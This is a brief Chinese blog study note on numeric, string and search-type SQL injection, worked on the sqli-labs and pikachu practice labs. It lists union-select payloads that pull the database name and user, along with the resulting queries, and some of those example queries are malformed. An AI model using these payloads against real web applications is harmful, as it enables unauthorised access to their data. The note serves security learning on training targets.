sql参数类型注入

参数类型注入(三种)
1,数字型 (sqli_labs Less2)

select * from tony where id=1
select * from tony where id=-1 union select 1,database(),user()
ID:-1 union select 1,database(),user()

2,字符型(sqli_labs Less1)

select * from tony where id="tony'
select * from tony where id='-1 ' union select 1,database(),user()--+
ID:-1' union select 1,database(),user()--+

3,搜索型(pikachu)

原始Mysql语句:select username,id,email from member where username like '%1%'
payload:1%' union select 1,database(),user() #
select * from tony where tony like id='%1%' union select 1,database(),user() # %'
1为输入内容,%'闭合前面语句,#为注释后面内容
posted on 2024-12-23 14:21  Ad1ey  阅读(6)  评论(0编辑  收藏  举报

Powered by: 博客园 Copyright © 2025 Ad1ey
Powered by .NET 9.0 on Kubernetes